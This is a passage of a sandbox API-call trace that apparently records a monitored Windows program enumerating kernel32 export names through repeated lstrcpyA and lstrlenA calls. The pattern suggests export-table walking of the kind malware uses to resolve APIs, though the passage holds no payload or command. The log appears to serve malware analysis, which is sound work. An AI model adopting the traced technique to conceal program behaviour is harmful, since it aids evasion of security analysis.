lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.338] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.338] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.338] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.338] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.338] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.338] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.338] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.338] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.338] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.338] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.338] lstrlenA (lpString="BEEP") returned 4 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.338] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.338] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.338] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.338] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.338] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.338] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.338] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.338] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.339] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.339] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.339] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.339] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.339] lstrlenA (lpString="CANCELIO") returned 8 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.339] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.339] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.339] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.339] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.339] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.339] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.339] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.339] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.339] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.339] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.339] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.339] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.339] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.339] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.340] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.340] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.340] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.340] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.340] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.340] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.340] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.340] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.340] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.340] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.340] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.340] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.340] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.340] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.340] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.340] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.340] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.340] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.340] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.341] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.341] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.341] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.341] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.341] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.341] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.341] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.341] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.341] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.341] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.341] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.341] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.342] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.342] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.342] lstrlenA (lpString="COPYFILEA") returned 9 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.342] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.342] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.342] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.342] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.342] lstrlenA (lpString="COPYFILEW") returned 9 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.342] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.342] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.342] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.342] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.342] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.342] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.342] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.342] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.342] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.342] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.342] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.342] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.343] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.343] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.343] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.343] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.343] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.343] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.343] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.343] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.343] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.343] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.343] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.343] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.343] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.343] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.343] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.343] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.343] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.343] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.343] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.343] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.344] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.344] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.344] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.344] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.344] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.344] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.344] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.344] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.344] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.344] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.344] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.344] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.344] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.344] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.344] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.344] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.344] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.344] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.344] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.344] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.345] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.345] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.345] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.345] lstrcpyA (in: lpString1=0x3f2d1ec, 